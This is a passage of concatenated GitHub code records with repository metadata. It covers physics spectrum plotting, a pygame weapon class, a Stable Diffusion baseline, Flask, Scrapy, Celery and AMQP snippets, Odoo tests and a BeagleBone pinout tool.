Fit: $I\\cdot e^{E/w} + c$\",\n color=\"gray\"\n)\n\n## add the curve parameters to plot\n\nplt.annotate(\n \"$c = ({c:.3fL})$ keV\\n$I = ({I:.3fL})$ keV\\n$w = ({w:.3fL})$ keV\".format(\n c=fparams[2]*1000,\n I=fparams[0]*1000,\n w=fparams[1]*1000\n ),\n xy=(.9, 0.05),\n xycoords='data',\n xytext=(0, 0),\n textcoords='offset points',\n fontsize=14,\n bbox=dict(\n boxstyle=\"round\",\n fc=\"1\"\n )\n)\n\n\nplt.xlabel('Energy / MeV')\nplt.ylabel('$\\Delta$ Energy / MeV')\nplt.legend()\nplt.savefig(\"energy_resolution.png\")\n\n\n\nplt.cla()\nax1 = fig.add_subplot(111)\nax2 = ax1.twiny()\n\n###############################################################################\n# plot intensity with Energy\nfor e in values.keys():\n ax1.cla()\n\n # plot intensity measurements\n ax1.plot(\n collected_data[e + \"_int\"] -\n collected_data[\"underground_int\"] /\n 71304 * values[e][\"timeframe\"],\n collected_data.index.values,\n color=\"gray\"\n )\n\n ymax = collected_data[e + \"_int\"][20:].max()*1.1\n\n for i, pos in enumerate(values[e][\"marked_ch\"]):\n if e == \"ba133\":\n offset = 5000\n else:\n offset = 0\n ann_ypos = np.linspace( ymax*.01+offset, ymax/4+offset, 5)\n ax1.vlines(\n pos,\n 0,\n ymax,\n linestyles='dotted',\n colors='gray'\n )\n\n ax1.annotate(\n \"ch = {:.0f}\\nE = ${:.3fL}$ MeV\".format(\n pos,\n pos * fit_en_m+fit_en_c\n ),\n xy=(pos, ann_ypos[i]),\n xycoords='data',\n xytext=(0, 0),\n textcoords='offset points',\n fontsize=10,\n bbox=dict(\n boxstyle=\"round\",\n fc=\"1\"\n )\n )\n\n for i, interv in enumerate(values[e][\"fitting_interval\"]):\n fit_xdata = np.arange(interv[0], interv[1])\n\n\n ax1.plot(\n fit_xdata,\n distr(\n fit_xdata,\n values[e][\"peak_params\"][i][0].n,\n values[e][\"peak_params\"][i][1].n,\n values[e][\"peak_params\"][i][2].n\n )# + offset\n )\n\n ylimits = np.array([0, ymax])\n\n # dummy plot\n #ax2.plot(np.arange(0, 1, .1), np.ones(10))\n ax2.set_xlim([fit_en_c.n, values[e][\"xlim_r\"] * fit_en_m.n + fit_en_c.n])\n\n ax2color = \"#00cc00\"\n\n ax2.grid(b=True, which=\"major\", color=ax2color)\n ax2.spines['top'].set_color(ax2color)\n ax2.tick_params(axis='x', colors=ax2color)\n\n ax2.set_xlabel(\"Energy / MeV\")\n\n # plot meta\n ax1.set_xlim([20, values[e][\"xlim_r\"]])\n ax1.set_ylim(ylimits)\n\n ax1.set_xlabel(\"Channel\")\n ax1.set_ylabel(\"Counts\")\n ax1.legend()\n\n elm = e[:2].capitalize()\n nc = e[2:]\n plt.title(\"Intensityspectrum of $^{{{}}}${}\".format(nc, elm), y=1.08)\n\n plt.savefig(\"int_\" + e + \".png\")\n plt.cla()\n\n###############################################################################\n# plot coincidence spectra\n\ncoinc_list = {\n \"co60\": {\n \"filename\": \"co60_koinz\",\n \"fitting_interval\": [[1.2, 1.325], [1.36, 1.49]],\n \"name\": \"$^{60}$Co\"\n },\n \"cs137_uncal\":{\n \"filename\": \"cs137_koinz_02\",\n \"fitting_interval\": [[0.68, 0.8]],\n \"name\": \"$^{137}$Cs uncalibrated\"\n },\n \"cs137_cal\": {\n \"filename\": \"cs137_koinz_03\",\n \"fitting_interval\": [[0.68, 0.8]],\n \"name\": \"$^{137}$Cs calibrated\"\n }\n}\n\nfor e in coinc_list.keys():\n data = pd.read_table(\n \"data/\" + coinc_list[e][\"filename\"],\n header=None, decimal=','\n ).transpose()\n data.columns = [e]\n xdata = np.array(data.index.values.tolist())*fit_en_m.n\n\n plt.clf()\n\n plt.plot(\n xdata,\n data[e],\n label = \"measurement of {}\".format(coinc_list[e][\"name\"])\n )\n\n # fit lorentzian(x, m, hwhm, int)\n for i, interv in enumerate(coinc_list[e][\"fitting_interval\"]):\n fitfilter = np.logical_and(xdata > interv[0], xdata < 
interv[1])\n\n p0 = [\n np.mean(interv),\n .05,\n 20\n ]\n\n\n #print(np.logical_and(xdata > interv[0], xdata < interv[1]))\n fparams = vtp.fit(\n xdata[fitfilter],\n data[e][fitfilter],\n distr,\n p0,\n None\n )\n print(fparams)\n\n plt.plot(\n xdata[fitfilter],\n distr(xdata[fitfilter], *(unp.nominal_values(fparams))),\n label= \"lorentzian fit\" +\n (\" no. {}\".format(i+1) if e == \"co60\" else \"\")\n )\n\n # plt.errorbar(\n # xdata[np.logical_not(fitfilter)],\n # distr(\n # xdata[np.logical_not(fitfilter)],\n # *(unp.nominal_values(fparams))\n # ),\n # fmt = \".\",\n # markersize=1\n # )\n\n\n #plt.hlines()\n\n\n ilist = data[data[e] > 5].index.tolist()\n print([min(ilist)*.9, max(ilist)*1.1])\n plt.xlim(np.array([min(ilist)*.9, max(ilist)*1.1])*fit_en_m.n)\n\n plt.xlabel(\"Energy / MeV\")\n plt.ylabel(\"Intensity\")\n plt.legend()\n plt.savefig(\"coinc_\" + e + \".png\")\n","repo_name":"acereca/FP","sub_path":"F83 - Koinzidenzspektrometer/spektra.py","file_name":"spektra.py","file_ext":"py","file_size_in_byte":12638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25334993420","text":"import random\nimport pygame\nimport colors\n\nclass Weapon:\n def __init__(self, constants):\n self.constants = constants\n self.charge = constants.MAX_WEAPON_CHARGE\n\n def draw(self, player, screen):\n beam_length_ns = self.BEAM_LENGTH*self.constants.CELL_HEIGHT\n beam_length_ew = self.BEAM_LENGTH*self.constants.CELL_WIDTH\n\n for i in range(self.NUMBER_OF_BOLTS):\n # start from center of cell\n start_point = (\n self.constants.CELL_WIDTH*player.x + self.constants.CELL_WIDTH//2,\n self.constants.CELL_HEIGHT*player.y + self.constants.CELL_HEIGHT//2)\n\n for j in range(self.BEAM_SEGMENTS):\n if player.facing == 0: # north\n end_point = (random.randint(start_point[0] - self.BEAM_WIDTH_STEP,\n start_point[0] + self.BEAM_WIDTH_STEP),\n start_point[1] - beam_length_ns//self.BEAM_SEGMENTS)\n elif player.facing == 1: # east\n end_point = (start_point[0] + beam_length_ew//self.BEAM_SEGMENTS,\n random.randint(start_point[1] - self.BEAM_WIDTH_STEP,\n start_point[1] + self.BEAM_WIDTH_STEP))\n elif player.facing == 2: # south\n end_point = (random.randint(start_point[0] - self.BEAM_WIDTH_STEP,\n start_point[0] + self.BEAM_WIDTH_STEP),\n start_point[1] + beam_length_ns//self.BEAM_SEGMENTS)\n else: # west\n end_point = (start_point[0] - beam_length_ew//self.BEAM_SEGMENTS,\n random.randint(start_point[1] - self.BEAM_WIDTH_STEP,\n start_point[1] + self.BEAM_WIDTH_STEP))\n\n pygame.draw.line(screen, colors.SOLID_CYAN, start_point, end_point,\n self.BEAM_WIDTH)\n start_point = end_point\n\n\nclass MiniBlaster(Weapon):\n def __init__(self, constants):\n super(MiniBlaster, self).__init__(constants)\n\n self.COST = 25\n self.NAME = 'Mini Blaster'\n self.DESCRIPTION = 'A weapon of underawing power.'\n self.BEAM_LENGTH = 1;\n self.BEAM_WIDTH_STEP = 5\n self.BEAM_SEGMENTS = 5\n self.BEAM_WIDTH = 1\n self.NUMBER_OF_BOLTS = 1\n self.DAMAGE = 4\n\nclass SuperMegaCannon(Weapon):\n def __init__(self, constants):\n super(SuperMegaCannon, self).__init__(constants)\n\n self.COST = 12500\n self.NAME = 'Super Mega Cannon'\n self.DESCRIPTION = 'A weapon of awesome power.'\n self.BEAM_LENGTH = 12;\n self.BEAM_WIDTH_STEP = 50\n self.BEAM_SEGMENTS = 10\n self.BEAM_WIDTH = 5\n self.NUMBER_OF_BOLTS = 5\n self.DAMAGE = 18\n\nclass MultiBlaster(Weapon):\n def __init__(self, constants):\n super(MultiBlaster, self).__init__(constants)\n\n self.COST = 0 # need to change if it can 
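Each coincidence peak is fitted only inside its window by building a boolean mask over the energy axis and indexing both arrays with it — the same np.logical_and pattern, reduced to its essentials:

import numpy as np

xdata = np.linspace(0, 2, 2048)
ydata = np.exp(-((xdata - 1.25) / 0.03) ** 2)

interv = (1.2, 1.325)
fitfilter = np.logical_and(xdata > interv[0], xdata < interv[1])
x_fit, y_fit = xdata[fitfilter], ydata[fitfilter]   # window passed to the fit
print(x_fit.min(), x_fit.max(), len(x_fit))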
ever be bought\n self.NAME = 'Multi Blaster'\n self.DESCRIPTION = 'This wepon shoots two beams at once, making the scare time on monsters longer.'\n self.BEAM_LENGTH = 1;\n self.BEAM_WIDTH_STEP = 10\n self.BEAM_SEGMENTS = 5\n self.BEAM_WIDTH = 2\n self.NUMBER_OF_BOLTS = 2\n self.DAMAGE = 8\n\ndef list_weapons(constants):\n # returns a tuple with an instance of each weapon type\n return ( MiniBlaster(constants), SuperMegaCannon(constants), MultiBlaster(constants) )\n\n#\n# TESTS\n#\n\ndef test_list_weapons(constants):\n # makes sure that every weapon has expected constants\n for weapon in list_weapons(constants):\n assert weapon.BEAM_LENGTH > 0, 'missing BEAM_LENGTH'\n assert weapon.BEAM_WIDTH_STEP > 0, 'missing BEAM_WIDTH_STEP'\n assert weapon.BEAM_SEGMENTS > 0, 'missing BEAM_SEGMENTS'\n assert weapon.BEAM_WIDTH > 0, 'missing BEAM_WIDTH'\n assert weapon.NUMBER_OF_BOLTS > 0, 'missing NUMBER_OF_BOLTS'\n assert weapon.charge > 0, 'missing charge'\n\ndef run_tests(constants):\n test_list_weapons(constants)\n","repo_name":"joelodom/bernard","sub_path":"weapons.py","file_name":"weapons.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"34103901151","text":"\"\"\"Defines the baseline Stable Diffusion image-to-image model\"\"\"\nimport torch\nimport torch.nn as nn\nimport diffusers\nfrom util import device\nimport util\nfrom noisy_dataset import NoisyDataset\n\n\nclass ImageToImageBaseline(nn.Module):\n def __init__(self, sd_pipeline: diffusers.StableDiffusionImg2ImgPipeline, strength: float, nsteps: int = 50,\n prompt=None, negative_prompt=None, cfg: float = 0):\n super().__init__()\n self.sd = sd_pipeline\n self.strength = strength\n self.nsteps = nsteps\n\n if prompt is not None or negative_prompt is not None:\n assert cfg > 0\n else:\n assert cfg == 0 # this leads to unconditional sampling\n self.cfg = cfg\n self.prompt = prompt if prompt is not None else \"\"\n self.negative_prompt = negative_prompt\n\n def forward(self, xs, **kwargs):\n # xs : B x C x H x W\n (out, ), _ = self.sd(\n prompt=self.prompt,\n image=xs,\n strength=self.strength,\n num_inference_steps=self.nsteps,\n guidance_scale=self.cfg,\n negative_prompt=self.negative_prompt,\n return_dict=False,\n output_type=\"pt\", # return a Tensor\n **kwargs\n )\n # Given batch size 1, the pipeline automatically removes this dimension\n if len(out.shape) == 3:\n return out.unsqueeze(0)\n return out\n\n\nif __name__ == \"__main__\":\n parser = util.get_parser()\n args = parser.parse_args()\n prompt = \" \".join(args.prompt) if args.prompt is not None else None\n nprompt = \" \".join(args.nprompt) if args.nprompt is not None else None\n\n print(f\"Running with strength={args.strength}, cfg={args.cfg}, prompt={prompt}, nprompt={nprompt}\")\n\n transform = util.eval_transform(size=512)\n test_ds = NoisyDataset(root_path=args.directory, split=\"test\", transform=transform)\n\n sd = diffusers.StableDiffusionImg2ImgPipeline.from_pretrained(\n args.model,\n torch_dtype=torch.float16,\n safety_checker=None,\n ).to(device)\n # sd.enable_freeu(s1=0.9, s2=0.2, b1=1.2, b2=1.4)\n sd.set_progress_bar_config(disable=True)\n assert sd.safety_checker is None\n model = ImageToImageBaseline(sd,\n strength=args.strength,\n prompt=prompt,\n negative_prompt=nprompt,\n cfg=args.cfg,\n nsteps=args.nsteps).to(device)\n\n out_dir = f\"out/baseline_s={args.strength}_cfg={args.cfg}\"\n util.inference_on_dataset(model, test_ds, out_dir, 
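Weapon.draw() fakes a lightning bolt by walking BEAM_SEGMENTS steps toward the target and jittering the perpendicular coordinate by up to BEAM_WIDTH_STEP pixels each step. The geometry alone, for the northward-firing case, with pygame left out so the point list is printable:

import random

def beam_points(start, length, segments, width_step):
    # Walk `segments` steps north, jittering x around the previous point,
    # exactly as the per-segment loop above does before pg.draw.line().
    points = [start]
    x, y = start
    for _ in range(segments):
        x = random.randint(x - width_step, x + width_step)
        y -= length // segments
        points.append((x, y))
    return points

print(beam_points((100, 200), 120, 5, 10))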
batch_size=1)\n\n\n","repo_name":"VikaasVarma/GenerativeGaussianSplooging","sub_path":"baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"4420329410","text":"from flask import Flask, render_template, json\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route('/api')\ndef api():\n my_dict = {\"user\": {\"name\": \"Lucas\", \"age\": \"28\"}}\n return json.dumps(my_dict)\n\n\nif __name__ == \"__main__\":\n print(\"Server is running on localhost\")\n app.run(debug=True)\n","repo_name":"IndianTinker/Nuxt-Flask-Boilerplate","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"8033136594","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport tweepy\nimport scrapy_twitter\nfrom radyolo.items import StreamItem\n\n\nclass StreamSpider(scrapy.Spider):\n name = 'stream-spider'\n allowed_domains = ['twitter.com']\n\n def __init__(self, track=None, *args, **kwargs):\n if not track:\n raise scrapy.exceptions.CloseSpider('Argument track not set.')\n super(StreamSpider, self).__init__(*args, **kwargs)\n self.track = track.split(',')\n\n def start_requests(self):\n return [scrapy_twitter.TwitterStreamFilterRequest(track=self.track)]\n\n def parse(self, response):\n tweets = response.tweets\n\n for tweet in tweets:\n tweet_item = scrapy_twitter.to_item(tweet)\n yield StreamItem(\n username=tweet_item['user']['screen_name'],\n text=tweet_item['text'],\n timestamp=tweet_item['timestamp_ms'])\n\n","repo_name":"serkansokmen/radyolo-scraper","sub_path":"radyolo/spiders/stream_spider.py","file_name":"stream_spider.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40760101613","text":"from json import loads as json_loads\r\nfrom os import environ\r\n\r\nfrom celery import Celery\r\n\r\nfrom base import Session\r\nfrom weather import Weather\r\n\r\nhost = environ['REDIS_HOST']\r\nport = environ['REDIS_PORT']\r\n\r\napp = Celery('tasks', broker='redis://' + host + ':' + port + '/0')\r\n\r\n\r\n@app.task(name='save_data')\r\ndef save(data):\r\n d = json_loads(data)\r\n session = Session()\r\n\r\n time_equals = Weather.dt == d[\"dt\"]\r\n city_equals = Weather.city == d[\"city\"]\r\n\r\n # check if data is in the DB\r\n q = session.query(Weather).filter(time_equals).filter(city_equals).count()\r\n print(q)\r\n\r\n # if data is not in db, save it\r\n if q <= 0:\r\n w = Weather(\r\n d['temp'],\r\n d['temp_min'],\r\n d['temp_max'],\r\n d['dt'],\r\n d['humidity'],\r\n d['city']\r\n )\r\n session.add(w)\r\n session.commit()\r\n session.close()\r\n print(str(data) + 'is saved')\r\n else:\r\n print('not saved')\r\n return\r\n","repo_name":"gostrider/weather-fetching-re","sub_path":"collector.py","file_name":"collector.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71022048684","text":"from setuptools import Extension\nfrom distutils.core import setup\nfrom setuptools.command.test import test as TestCommand\nfrom Cython.Distutils import build_ext\nfrom Cython.Build import cythonize\nimport sys\n\n# cython = Extension('ea.cbenchmarks',\n# sources = ['ea/cbenchmarks.pyx'],\n# include_dirs = ['include/']\n# 
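ImageToImageBaseline is a thin wrapper over diffusers' img2img pipeline, and the same call works standalone. A sketch assuming a CUDA device; "runwayml/stable-diffusion-v1-5" and "noisy.png" are illustrative stand-ins for the repo's --model flag and dataset inputs:

import torch
import diffusers
from PIL import Image

pipe = diffusers.StableDiffusionImg2ImgPipeline.from_pretrained(
    "runwayml/stable-diffusion-v1-5",   # illustrative checkpoint
    torch_dtype=torch.float16,
    safety_checker=None,
).to("cuda")

init = Image.open("noisy.png").convert("RGB").resize((512, 512))
(out,), _ = pipe(
    prompt="",                # empty prompt + guidance_scale=0 ~ unconditional
    image=init,
    strength=0.3,             # fraction of the diffusion schedule to re-run
    num_inference_steps=50,
    guidance_scale=0,
    return_dict=False,        # -> (images, nsfw_flags), as in forward() above
)
out.save("denoised.png")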
)\nsourcefiles = ['cec2013lsgo/cec2013.pyx']\n\nsourcefiles += ['cec2013lsgo/eval_func.cpp', 'cec2013lsgo/Benchmarks.cpp']\n\nfor i in range(1, 16):\n sourcefiles += ['cec2013lsgo/F%d.cpp' % i]\n\ncec2013lsgo = Extension(\"cec2013lsgo.cec2013\",\n sourcefiles,\n language=\"c++\",\n extra_compile_args=[\"-std=c++11\"],\n libraries=[\"m\"]) # Unix-like specific\n\n\nclass PyTest(TestCommand):\n user_options = [('pytest-args=', 'a', \"Arguments to pass to py.test\")]\n\n def initialize_options(self): \n TestCommand.initialize_options(self)\n self.pytest_args = []\n\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_args = []\n self.test_suite = True\n\n def run_tests(self):\n #import here, cause outside the eggs aren't loaded\n import pytest\n\n errno = pytest.main(self.pytest_args)\n sys.exit(errno)\n\n\nsetup(\n name='cec2013lsgo',\n version='2.0',\n author='Daniel Molina',\n author_email='dmolina@decsai.ugr.es',\n maintainer='Daniel Molina',\n description='Package for benchmark for the Real \\\n Large Scale Global Optimization session on IEEE \\\n Congress on Evolutionary Computation CEC\\'2013',\n long_description=open('README.rst').read(),\n license='GPL V3',\n url='https://github.com/dmolina/cec2013lsgo',\n packages=['cec2013lsgo'],\n install_requires=['cython', 'numpy'],\n ext_modules=cythonize(cec2013lsgo),\n package_data={'cec2013lsgo': ['cdatafiles/*.txt']},\n tests_require=['pytest'],\n cmdclass={'build_ext': build_ext, 'test': PyTest},\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)',\n ]\n)\n","repo_name":"dmolina/cec2013lsgo","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"19"} +{"seq_id":"28871312981","text":"from odoo.tests.common import TransactionCase\n\n\nclass TestSale(TransactionCase):\n\n def setUp(self):\n super().setUp()\n company, unit, area, user = self.create_company('1')\n self.company_1 = company\n self.unit_1 = unit\n self.area_1 = area\n self.user_1 = user\n company, unit, area, user = self.create_company('2')\n self.company_2 = company\n self.unit_2 = unit\n self.area_2 = area\n self.customer = self.env['res.partner'].create({\n 'company_id': False,\n 'company_type': 'company',\n 'customer': True,\n 'supplier': False,\n 'name': 'Client',\n })\n\n def create_company(self, key):\n company = self.env['res.company'].create({\n 'name': 'Company %s' % key,\n })\n old_company = self.env.user.company_id\n self.env.user.company_id = company.id\n coas = self.env['account.chart.template'].search([])\n coas.try_loading_for_current_company()\n self.env.user.company_id = old_company.id\n user = self.env['res.users'].create({\n 'name': 'User %s' % key,\n 'login': 'user_%s@test.com' % key,\n 'company_ids': [(6, 0, [company.id])],\n 'company_id': company.id,\n })\n unit = self.env['product.business.unit'].create({\n 'name': 'Business unit %s' % key,\n 'company_id': company.id,\n })\n area = self.env['product.business.area'].create({\n 'name': 'Unit %s' % key,\n 'unit_id': unit.id,\n })\n return company, unit, area, user\n\n def create_product(self, unit, area, list_price=33.33):\n return self.env['product.product'].create({\n 'type': 'service',\n 'company_id': False,\n 'unit_id': unit.id,\n 'area_id': area.id,\n 'name': 'Service product',\n 'standard_price': round(list_price / 2),\n 'list_price': list_price,\n })\n\n def 
test_sale(self):\n product = self.create_product(self.unit_1, self.area_1, 33.33)\n sale = self.env['sale.order'].create({\n 'partner_id': self.customer.id,\n 'order_line': [\n (0, 0, {\n 'product_id': product.id,\n 'price_unit': 33.33,\n 'product_uom_qty': 1}),\n ]\n })\n self.assertTrue(sale.name)\n self.assertEquals(len(sale.order_line), 1)\n self.assertEquals(sale.state, 'draft')\n sale.action_confirm()\n self.assertEquals(sale.state, 'sale')\n self.assertEquals(sale.invoice_count, 0)\n sale.action_invoice_create()\n self.assertEquals(sale.invoice_count, 1)\n self.assertEquals(\n sale.invoice_ids[0].company_id, self.unit_1.company_id)\n\n def test_sale_two_invoices(self):\n product_1 = self.create_product(self.unit_1, self.area_1, 33.33)\n product_2 = self.create_product(self.unit_2, self.area_2, 33.33)\n sale = self.env['sale.order'].create({\n 'partner_id': self.customer.id,\n 'order_line': [\n (0, 0, {\n 'product_id': product_1.id,\n 'price_unit': 33.33,\n 'product_uom_qty': 1}),\n (0, 0, {\n 'product_id': product_2.id,\n 'price_unit': 33.33,\n 'product_uom_qty': 1}),\n ]\n })\n sale.action_confirm()\n sale.action_invoice_create()\n self.assertEquals(sale.invoice_count, 2)\n for inv in sale.invoice_ids:\n company = inv.mapped(\n 'invoice_line_ids.product_id.unit_id.company_id')\n self.assertEquals(inv.company_id, company)\n","repo_name":"pranav-1into2/Minsk","sub_path":"trey-addons/account_intercompany/tests/test_sale.py","file_name":"test_sale.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"23876276271","text":"from typing import Mapping, Any\nfrom dataclasses import dataclass\n\nfrom start import app\nfrom server.amqp import AMQPConsumer\nfrom patterns.service import IService\nfrom services.user_exclusion_service import (\n UserExclusionService,\n UserExclusionServiceProps,\n)\n\n\n@dataclass\nclass UserExclusionConsumerPayload:\n user_uuid: str\n\n\n@app.amqp.add_consumer(\n \"user_folder_exclusion_consumer\",\n \"queue_user_folder_exclusion\",\n ack=True,\n data_class=UserExclusionConsumerPayload,\n)\nclass UserExclusionConsumer(AMQPConsumer):\n def on_message_queue(\n self, body: UserExclusionConsumerPayload, **kwargs: Mapping[str, Any]\n ) -> None:\n user_exclusion_props: UserExclusionServiceProps = UserExclusionServiceProps(\n body.user_uuid\n )\n\n user_exclusion_service: IService[\n UserExclusionServiceProps, None\n ] = UserExclusionService()\n\n user_exclusion_service.execute(user_exclusion_props)\n","repo_name":"VictorHenrich/application-amqp","sub_path":"src/consumers/user_exclusion_consumer.py","file_name":"user_exclusion_consumer.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41425408552","text":"import src.colors as colors\nimport os\n\n# Dimensions\nPINOUT_ZONE_SIZE = 46\nPINOUT_COLUMN_LENGTH = 23\n\nMARGIN_SHOW = 10\nONE_COLUMN_FORMAT = 0\nTWO_COLUMNS_FORMAT = 1\n\ndef load_pinout_config(config_file):\n '''\n Parse the specified file to load the different modes of each pin of zones P8 and P9\n '''\n df = open(config_file, \"r\")\n\n p8_pins = [] # List of tuples ([modes], [buses])\n p9_pins = [] # List of tuples ([modes], [buses])\n\n # Config file lines\n for index, line in enumerate(df.readlines()):\n if (index < PINOUT_ZONE_SIZE):\n p8_entry_modes = []\n for mode in line.split(\"|\")[1].split(\"@\")[0].split(\" \"):\n p8_entry_modes.append(mode)\n 
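The consumer above declares its payload via data_class=UserExclusionConsumerPayload; the framework's decoding isn't shown, but the decorator strongly suggests a JSON body mapped onto the dataclass fields. A guess at that step, with a made-up UUID:

import json
from dataclasses import dataclass

@dataclass
class UserExclusionPayload:
    user_uuid: str

def decode(body: bytes) -> UserExclusionPayload:
    # Assumed behavior of the `data_class=` hook: parse the raw AMQP body
    # as JSON and map its keys onto the dataclass constructor.
    return UserExclusionPayload(**json.loads(body))

print(decode(b'{"user_uuid": "123e4567-e89b-12d3-a456-426614174000"}'))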
p8_entry_buses = []\n            try:\n                for bus in line.split(\"|\")[1].split(\"@\")[1].split(\" \"):\n                    p8_entry_buses.append(bus)\n            except IndexError:\n                p8_entry_modes[-1] = p8_entry_modes[-1][:-1] # Remove last item's \\n (There are no buses, so the '\\n' character is on the last mode)\n            else:\n                p8_entry_buses[-1] = p8_entry_buses[-1][:-1] # Remove last item's \\n (The '\\n' is on the last bus)\n            p8_pins.append((p8_entry_modes[1:], p8_entry_buses)) # Remove first space\n\n        else:\n            p9_entry_modes = []\n            for mode in line.split(\"|\")[1].split(\"@\")[0].split(\" \"):\n                p9_entry_modes.append(mode)\n            p9_entry_buses = []\n            try:\n                for bus in line.split(\"|\")[1].split(\"@\")[1].split(\" \"):\n                    p9_entry_buses.append(bus)\n            except IndexError:\n                p9_entry_modes[-1] = p9_entry_modes[-1][:-1] # Remove last item's \\n (There are no buses, so the '\\n' character is on the last mode)\n            else:\n                p9_entry_buses[-1] = p9_entry_buses[-1][:-1] # Remove last item's \\n (The '\\n' is on the last bus)\n            p9_pins.append((p9_entry_modes[1:], p9_entry_buses)) # Remove first space\n\n    return p8_pins, p9_pins\n\ndef get_gpio_states():\n    '''\n    Returns a list of tuples with the GPIO states\n    '''\n    gpio_states = []\n    # NOTE: populating the list is not implemented yet; return the (empty)\n    # list so that callers still receive the documented type.\n    return gpio_states\n\ndef get_color(mode):\n    '''\n    Returns the color of the mode passed as parameter.\n    '''\n    if \"GPIO\" in mode:\n        return colors.GREEN\n    elif \"AIN\" in mode:\n        return colors.CYAN\n    elif \"PWM\" in mode:\n        return colors.YELLOW\n    elif \"UART\" in mode:\n        return colors.PURPLE\n    elif \"SPI\" in mode:\n        return colors.RED\n    elif \"I2C\" in mode:\n        return colors.BLUE\n    elif \"3V3\" in mode or \"5V\" in mode or \"VDD\" in mode:\n        return colors.BROWN\n    elif \"GND\" in mode:\n        return colors.ORANGE\n    else:\n        return colors.WHITE\n\ndef list_has_element(list, elem):\n    '''\n    Returns True if the list passed as parameter has the element passed as parameter.\n    '''\n    for list_i in list:\n        if list_i in elem:\n            return True\n    return False\n\nclass PinsManager():\n    \n    def __init__(self):\n        \n        # Load pins configuration file\n        #self.file = open(\"/opt/source/dtb-4.14-ti/src/arm/am5729-beagleboneai-roboticscape.dts\", \"r\")\n\n        self.p8_pins, self.p9_pins = load_pinout_config(\"files/pins_modes\")\n\n        # Update pins status\n        self.refresh_gpio_list()\n\n        # Pins which are not available\n        self.enabled_buses = []\n        self.enabled_buses += self.gpio_list_enabled\n        #self.enabled_buses.append(self.ain_list_enabled)\n        #self.enabled_buses.append(self.pwm_list_enabled)\n        #self.enabled_buses.append(self.i2c_list_enabled)\n        #self.enabled_buses.append(self.spi_list_enabled)\n        #self.enabled_buses.append(self.uart_list_enabled)\n\n\n    def refresh_gpio_list(self):\n\n        # List directories from the /sys/class/gpio folder\n        self.gpio_list_enabled = os.listdir(\"/sys/class/gpio\")\n        # Filter the list to only the GPIOs\n        self.gpio_list_enabled = [gpio[4:] for gpio in self.gpio_list_enabled if gpio.startswith(\"gpio\") and \"chip\" not in gpio]\n\n    def show_pinout(self, format=TWO_COLUMNS_FORMAT, filtered_pins=None, show_enabled=False, get_color_function=get_color):\n\n        if format == ONE_COLUMN_FORMAT:\n\n            # Useful to calculate the number of spaces to insert into each row in order to adjust the displayed info\n            p9_left_spaces = 0\n            for i in range(PINOUT_ZONE_SIZE):\n                if filtered_pins:\n                    p9_i_list = [pin for pin in self.p9_pins[i][0] if list_has_element(filtered_pins, pin.lower())]\n                else:\n                    p9_i_list = self.p9_pins[i][0]\n                aux_len = len(\" \".join(p9_i_list))\n                if aux_len > p9_left_spaces:\n                    p9_left_spaces = aux_len\n            \n            print(\"\\n\")\n            for i in range(PINOUT_ZONE_SIZE):\n                # Filter to pins in 
filtered_pins\n                if filtered_pins is not None:\n                    p9_i_list = [pin for pin in self.p9_pins[i][0] if list_has_element(filtered_pins, pin.lower())]\n                    p8_i_list = [pin for pin in self.p8_pins[i][0] if list_has_element(filtered_pins, pin.lower())]\n                else:\n                    p9_i_list = self.p9_pins[i][0]\n                    p8_i_list = self.p8_pins[i][0]\n\n                # Get associated status for each pin\n                p9_entry_status = None\n                p8_entry_status = None\n\n                if show_enabled and len(self.enabled_buses) > 0:\n                    p9_entry_status = [(pin not in self.enabled_buses) for pin in self.p9_pins[i][1]]\n                    p8_entry_status = [(pin not in self.enabled_buses) for pin in self.p8_pins[i][1]]\n\n                aux_len = len(\" \".join(p9_i_list))\n                left_painted_list = colors.get_painted_list(get_color_function, p9_i_list, selected_pins_map=p9_entry_status)\n                right_painted_list = colors.get_painted_list(get_color_function, p8_i_list, selected_pins_map=p8_entry_status)\n                \n                print(\" \" * (p9_left_spaces - aux_len) + \" \" * MARGIN_SHOW + \" \".join(left_painted_list) + \" |\" + \" \" * (3 - len(str(i + 1)) + 1) + f\"{colors.PURPLE}P9_{i+1} --- P8_{i+1}{colors.WHITE}\"\n                    + \" \" * (3 - len(str(i + 1)) + 1) + \"| \" + \" \".join(right_painted_list))\n\n        else: # TWO_COLUMNS_FORMAT \n\n            # Useful to calculate the number of spaces to insert into each row in order to adjust the displayed info\n            p9_left_spaces = 0\n            p9_right_spaces = 0\n            p8_left_spaces = 0\n            for i in range(0, PINOUT_ZONE_SIZE, 2):\n                # Filter to pins in filtered_pins\n                if filtered_pins is not None:\n                    p9_left_i_list = [pin for pin in self.p9_pins[i][0] if list_has_element(filtered_pins, pin.lower())]\n                    p9_right_i_list = [pin for pin in self.p9_pins[i+1][0] if list_has_element(filtered_pins, pin.lower())]\n                    p8_left_i_list = [pin for pin in self.p8_pins[i][0] if list_has_element(filtered_pins, pin.lower())]\n                else:\n                    p9_left_i_list = 